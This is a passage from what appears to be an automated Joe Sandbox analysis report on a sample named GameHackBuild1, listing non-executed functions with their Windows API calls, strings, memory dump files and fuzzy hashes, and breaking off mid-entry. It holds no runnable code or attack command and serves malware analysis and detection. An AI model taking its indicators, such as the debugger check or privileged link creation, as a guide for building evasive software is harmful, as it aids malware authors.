                                      Non-executed Functions

                                      Function 00A1B8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A0130B: GetDlgItem.USER32(00000000,00003021), ref: 00A0134F
                                        • Part of subcall function 00A0130B: SetWindowTextW.USER32(00000000,00A335B4), ref: 00A01365
                                      • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00A1B971
                                      • EndDialog.USER32(?,00000006), ref: 00A1B984
                                      • GetDlgItem.USER32(?,0000006C), ref: 00A1B9A0
                                      • SetFocus.USER32(00000000), ref: 00A1B9A7
                                      • SetDlgItemTextW.USER32(?,00000065,?), ref: 00A1B9E1
                                      • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00A1BA18
                                      • FindFirstFileW.KERNEL32(?,?), ref: 00A1BA2E
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A1BA4C
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A1BA5C
                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00A1BA78
                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00A1BA94
                                      • _swprintf.LIBCMT ref: 00A1BAC4
                                        • Part of subcall function 00A0400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A0401D
                                      • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00A1BAD7
                                      • FindClose.KERNEL32(00000000), ref: 00A1BADE
                                      • _swprintf.LIBCMT ref: 00A1BB37
                                      • SetDlgItemTextW.USER32(?,00000068,?), ref: 00A1BB4A
                                      • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00A1BB67
                                      • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00A1BB87
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A1BB97
                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00A1BBB1
                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00A1BBC9
                                      • _swprintf.LIBCMT ref: 00A1BBF5
                                      • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00A1BC08
                                      • _swprintf.LIBCMT ref: 00A1BC5C
                                      • SetDlgItemTextW.USER32(?,00000069,?), ref: 00A1BC6F
                                        • Part of subcall function 00A1A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00A1A662
                                        • Part of subcall function 00A1A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,00A3E600,?,?), ref: 00A1A6B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                      • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                      • API String ID: 797121971-1840816070
                                      • Opcode ID: 68c1d419ab0c5d74d3964e4f000b56808e56e3cae66c27254c88e634790bfb9e
                                      • Instruction ID: 7637831d1236428b5ccb6b0e1dd8ea1b2f9cc15fe4c46a1d4271bbe226743ede
                                      • Opcode Fuzzy Hash: 68c1d419ab0c5d74d3964e4f000b56808e56e3cae66c27254c88e634790bfb9e
                                      • Instruction Fuzzy Hash: 1B9183B2248348BFD621DBA0DD49FFBB7ACEB4A700F040919F749D2091D775AA468772
                                      Function 00A0718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00A07191
                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 00A072F1
                                      • CloseHandle.KERNEL32(00000000), ref: 00A07301
                                        • Part of subcall function 00A07BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00A07C04
                                        • Part of subcall function 00A07BF5: GetLastError.KERNEL32 ref: 00A07C4A
                                        • Part of subcall function 00A07BF5: CloseHandle.KERNEL32(?), ref: 00A07C59
                                      • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00A0730C
                                      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00A0741A
                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00A07446
                                      • CloseHandle.KERNEL32(?), ref: 00A07457
                                      • GetLastError.KERNEL32(00000015,00000000,?), ref: 00A07467
                                      • RemoveDirectoryW.KERNEL32(?), ref: 00A074B3
                                      • DeleteFileW.KERNEL32(?), ref: 00A074DB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                      • API String ID: 3935142422-3508440684
                                      • Opcode ID: bef014f852d816c2fc4f53c1c96ff3ad0990e84302f09b587087299d7b439ca2
                                      • Instruction ID: 021130c5038ce9c86d52122fb47ccea401014aa02a3aad16f5c173c44684cc1b
                                      • Opcode Fuzzy Hash: bef014f852d816c2fc4f53c1c96ff3ad0990e84302f09b587087299d7b439ca2
                                      • Instruction Fuzzy Hash: D4B1C171D04219ABDF21DFA4ED41BEE77B8BF05300F044569F949E7182D734AA49CBA1
                                      Function 00A03281 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 608COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: H_prolog_memcmp
                                      • String ID: CMT$h%u$hc%u
                                      • API String ID: 3004599000-3282847064
                                      • Opcode ID: 70fdb24d409216fa195508dd09240e951f437f84fbe93be68d26ff81fc722679
                                      • Instruction ID: ddbc1a239609da6cfae4bd7baed77e9eee298030ab50a015c4b5615d8832ed86
                                      • Opcode Fuzzy Hash: 70fdb24d409216fa195508dd09240e951f437f84fbe93be68d26ff81fc722679
                                      • Instruction Fuzzy Hash: 1632B6726103889FDF14DF74D995AEA37A9AF54300F04457EFD8A8B2C2DB71A948CB60
                                      Function 00A2D00E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: __floor_pentium4
                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                      • API String ID: 4168288129-2761157908
                                      • Opcode ID: 79f545f786a2b9c6cd2de2086d2af4b451510f551c832ad566016aec0ef8493f
                                      • Instruction ID: a79e11e2c4505f81f21e8b6f83d53e002f23b339fad76ee5ac9c835bfa0b08d4
                                      • Opcode Fuzzy Hash: 79f545f786a2b9c6cd2de2086d2af4b451510f551c832ad566016aec0ef8493f
                                      • Instruction Fuzzy Hash: 66C22A72E086288FDB25CF28ED407EAB7B5EB44315F1545EAD84EE7241E774AE818F40
                                      Function 00A027E8 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 794COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00A027F1
                                      • _strlen.LIBCMT ref: 00A02D7F
                                        • Part of subcall function 00A1137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00A0B652,00000000,?,?,?,00010444), ref: 00A11396
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A02EE0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                      • String ID: CMT
                                      • API String ID: 1706572503-2756464174
                                      • Opcode ID: 4aa0b9a6c35419480fcaada050a230c11818a87ebb393b0997fe4b94f7f59fa9
                                      • Instruction ID: 54bb1eafe5b10b1f7d98611219f0baf0769747e2a2b40e087d4dc2e788c23fc2
                                      • Opcode Fuzzy Hash: 4aa0b9a6c35419480fcaada050a230c11818a87ebb393b0997fe4b94f7f59fa9
                                      • Instruction Fuzzy Hash: 6D62F2729003488FDF28DF24D9997EA3BE5AF58300F08457DEC9A8B2C2DB74A945CB50
                                      Function 00A2866F Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00A28767
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00A28771
                                      • UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 00A2877E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                      • String ID:
                                      • API String ID: 3906539128-0
                                      • Opcode ID: 0ca2552ab4be3663e4093a1b57f24334c16494ed13e1e31b0bbf9128c2188d70
                                      • Instruction ID: 5c6217b58d63eb9f01dae8c54641a1e061082c2be237b656474488ed705902c3
                                      • Opcode Fuzzy Hash: 0ca2552ab4be3663e4093a1b57f24334c16494ed13e1e31b0bbf9128c2188d70
                                      • Instruction Fuzzy Hash: 4131B5759012289BCB21DF68DD89BDCB7B4AF08310F5041EAF81CA7251EB349B858F45
                                      Function 00A2AAA8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .
                                      • API String ID: 0-248832578
                                      • Opcode ID: e3eb1d62d10f5d83bf470271f33bdf5b18343ae13b5295c30edf486e4ad62a1a
                                      • Instruction ID: a210f76ba620c5a47a3f34c0f619524e29c803915f350fbffe9212ab46226156
                                      • Opcode Fuzzy Hash: e3eb1d62d10f5d83bf470271f33bdf5b18343ae13b5295c30edf486e4ad62a1a
                                      • Instruction Fuzzy Hash: AF31F272800229AFCB24DF7CED84EEBBBBEDB95314F1401A8F91997251E6309D85CB50
                                      Function 00A2CB60 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                                      • Instruction ID: c6a95cc0716573e4489389be61f0bcf2aae14d0a421986f9b07940fc399df07b
                                      • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                                      • Instruction Fuzzy Hash: A9020D71E002299FDF14CFADD9806ADBBF1EF48324F254269E919E7384D731AA41CB90
                                      Function 00A1A63C Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00A1A662
                                      • GetNumberFormatW.KERNEL32(00000400,00000000,?,00A3E600,?,?), ref: 00A1A6B1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: FormatInfoLocaleNumber
                                      • String ID:
                                      • API String ID: 2169056816-0
                                      • Opcode ID: 37e2f68f27495eea0a381c26df4c8da47cc5db0d8d78885f58828b4d099d3adc
                                      • Instruction ID: 9ed2794ecef700bc8cad74ba3b89f7cd7396d622517bcb3a6b728006e0527617
                                      • Opcode Fuzzy Hash: 37e2f68f27495eea0a381c26df4c8da47cc5db0d8d78885f58828b4d099d3adc
                                      • Instruction Fuzzy Hash: 09014836500308BADB10CFA5EC06FABB7BCEF19711F004922BA04A7190D3709A258BA5
                                      Function 00A06EC9 Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(00A1117C,?,00000200), ref: 00A06EC9
                                      • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00A06EEA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ErrorFormatLastMessage
                                      • String ID:
                                      • API String ID: 3479602957-0
                                      • Opcode ID: 0c501c1487f3e4f707522488ccbd98956d28be552840f89e3bbae394206aac1a
                                      • Instruction ID: a45ae861117e9960026df64485e9e112f5065c3dbfe730aa4dd7842ac3e52086
                                      • Opcode Fuzzy Hash: 0c501c1487f3e4f707522488ccbd98956d28be552840f89e3bbae394206aac1a
                                      • Instruction Fuzzy Hash: 66D0C7363C8306BFEE114B74DC05F277B64675AB46F108514B357D90D0C57090359615
                                      Function 00A31194 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00A3118F,?,?,00000008,?,?,00A30E2F,00000000), ref: 00A313C1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ExceptionRaise
                                      • String ID:
                                      • API String ID: 3997070919-0
                                      • Opcode ID: df5964088eb6d4ddb69454c6af87072f58dc2da9331f954f9e3928abed8da65d
                                      • Instruction ID: 7da94d1bad9b0e5c1c0201ec28558e519662cbe29f34585c0c424ba4067e5a61
                                      • Opcode Fuzzy Hash: df5964088eb6d4ddb69454c6af87072f58dc2da9331f954f9e3928abed8da65d
                                      • Instruction Fuzzy Hash: 91B14B71610608DFD715CF28C48ABA57BE0FF45364F298668F899CF2A1C335E992CB40
                                      Function 00A0407E Relevance: 1.6, Strings: 1, Instructions: 332COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: gj
                                      • API String ID: 0-4203073231
                                      • Opcode ID: 0d57d218fe89d0166f28328cdcd9a1fa5b348b01b3fec8eb1893101a2ad161d8
                                      • Instruction ID: a52ca8b00261a6282c756e36b13ae38ecfa0c91779006251d1770a70ba8b8297
                                      • Opcode Fuzzy Hash: 0d57d218fe89d0166f28328cdcd9a1fa5b348b01b3fec8eb1893101a2ad161d8
                                      • Instruction Fuzzy Hash: 50F1C2B2A083418FD748CF29D880A1AFBE1BFCC208F15892EF598D7711E774E9558B56
                                      Function 00A0ACF5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetVersionExW.KERNEL32(?), ref: 00A0AD1A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Version
                                      • String ID:
                                      • API String ID: 1889659487-0
                                      • Opcode ID: a5d7b1368dc48b816c22d52d2a14ef26af5eaed207f75243dba2fdc958859024
                                      • Instruction ID: 02ac16f748cf6e851b5bce0d1af3fed945adcef1cd2f0df8ba856d18de49182b
                                      • Opcode Fuzzy Hash: a5d7b1368dc48b816c22d52d2a14ef26af5eaed207f75243dba2fdc958859024
                                      • Instruction Fuzzy Hash: 4AF01DB8D0030C8BCB28CB58FD41AE973B5F79A711F2006A9EA1943794D371AD469E51
                                      Function 00A1F063 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,00A1EAC5), ref: 00A1F068
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: 7e8fbe2de17c028644fee8e04b1c867aa07a33ee38e0f361088e6e7f065f6701
                                      • Instruction ID: 2c093945822b112073918ebab3c9283ea1d536beaf4635d72f3d3430c793dfbc
                                      • Opcode Fuzzy Hash: 7e8fbe2de17c028644fee8e04b1c867aa07a33ee38e0f361088e6e7f065f6701
                                      • Instruction Fuzzy Hash:
                                      Function 00A2B710 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: HeapProcess
                                      • String ID:
                                      • API String ID: 54951025-0
                                      • Opcode ID: 3214212f9a0e1bf54ce27d62555baa839f6d0bb5842473792d00adbb2d84ba83
                                      • Instruction ID: 749f0436968f4787850221798bd9558f9a68f9f195af09279b2382c4f48c8165
